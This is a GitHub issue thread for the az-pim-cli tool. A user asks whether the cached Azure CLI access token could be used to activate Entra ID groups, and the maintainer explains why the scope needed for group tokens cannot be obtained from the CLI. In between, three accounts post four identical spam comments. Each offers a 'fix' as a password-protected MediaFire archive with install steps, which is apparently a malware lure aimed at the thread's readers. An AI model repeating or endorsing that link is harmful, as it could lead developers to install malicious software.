### ISSUE TITLE
[feature request] Avoid to update token

### ISSUE THREAD

**Issue by ozbillwang** [netr0m/az-pim-cli#51]
### Welcome

- [x] Yes, I've searched similar [issues on GitHub](https://github.com/netr0m/az-pim-cli/issues) and didn't find any.

### Is your feature request related to a problem? Please describe

Previously, manually activating each group through the Azure Portal would take me 5 to 10 minutes per group. Now, I can use a script with a for-loop to activate all the groups simultaneously.

However, the only challenge I face is updating the token daily, which I can't automate. Each day, I need to log in to the Azure Portal, enable Developer mode, access PIM, navigate to the my roles ->  group, search for the URL, and copy out the token.

Is there a way to reference the latest login token from the cache after running `az login` so I can activate the groups directly?

### Describe the solution you'd like

Is there a way to reference the latest login from the cache after running `az login` so that I can activate groups directly?

### Describe alternatives you've considered

After `az login`, I can run the command `az account get-access-token` to get a `accessToken`

```
$ az account get-access-token

{
  "accessToken": "eyJ0eXAiOiJKV1QiLCJhbGciOxxxxxxxx",
  "expiresOn": "2024-08-28 17:24:25.000000",
  "expires_on": 1724829865,
  "subscription": "XXXXXXXX-ad9a-47fb-878b-XXXXXXXX",
  "tenant": "XXXXXXXX-ad9a-47fb-878b-XXXXXXXX",
  "tokenType": "Bearer"
}
```

Could we use this token to list group or activate groups?

(currently I tested within `~/.az-pim-cli.yaml`, it doesn't work with this token

### Additional context

N/A

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by netr0m** [comment]
This has already been covered in separate issues, as well as in the README under [Token for Entra ID Groups](https://github.com/netr0m/az-pim-cli?tab=readme-ov-file#token-for-entra-id-groups).

When managing _Azure Resources_ (i.e. `az-pim-cli list` / `az-pim-cli activate`), a token is already acquired by using `az account get-access-token`. The issue is that the scope required for these kinds of Azure resources (_Azure Resources_) is different from the scope required to manage _Azure Groups_ (i.e. `az-pim-cli list group` / `az-pim-cli activate group`). 

I have tried to identify an approach to automatically retrieve a token to activate _Azure Groups_ as well, but Microsoft/Azure does not allow specifying the necessary scope for this type of token on the CLI. Accessing a token/cookie in the browser storage is outside the scope of this utility.

See https://github.com/netr0m/az-pim-cli/issues/9#issuecomment-2142176087 and https://github.com/netr0m/az-pim-cli/issues/9#issuecomment-2124377703 as well.
